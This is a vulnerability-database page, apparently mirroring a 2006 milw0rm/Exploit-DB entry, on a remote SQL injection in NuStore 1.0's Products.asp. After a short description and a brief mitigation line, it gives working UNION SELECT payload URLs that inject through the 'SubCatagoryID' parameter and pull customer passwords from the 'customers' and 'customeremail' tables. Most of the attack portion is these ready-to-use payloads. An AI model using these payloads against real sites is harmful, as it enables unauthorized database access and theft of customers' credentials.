header-logo
Suggest Exploit
vendor:
NuStore
by:
ajann
9
CVSS
HIGH
SQL Injection
89
CWE
Product Name: NuStore
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

NuStore 1.0 (Products.asp) Remote SQL Injection Vulnerability

NuStore 1.0 is vulnerable to a remote SQL injection vulnerability. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. The vulnerable parameter is the ‘SubCatagoryID’ parameter which is located in the ‘Products.asp’ page. An attacker can inject arbitrary SQL code into the vulnerable parameter and execute it in the back-end database.

Mitigation:

The best way to mitigate this vulnerability is to ensure that all user input is properly sanitized and validated before being used in any SQL query.
Source

Exploit-DB raw data:

*******************************************************************************
# Title  :  NuStore 1.0 (Products.asp) Remote SQL Injection Vulnerability
# Author :   ajann

*******************************************************************************

###http://[target]/[path]/Products.asp?CategoryID=-1&SubCatagoryID=[  SQL ]

Example:

//Products.asp?CategoryID=-1&SubCatagoryID=-1%20union%20select%200,0,pass,0%20from%20customers%20where%20no=0
//Products.asp?CategoryID=-1&SubCatagoryID=-1%20union%20select%200,0,pass,0%20from%20customeremail%20where%20no=0

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2006-11-11]

Navigation

Suggest Exploit

Services By CQR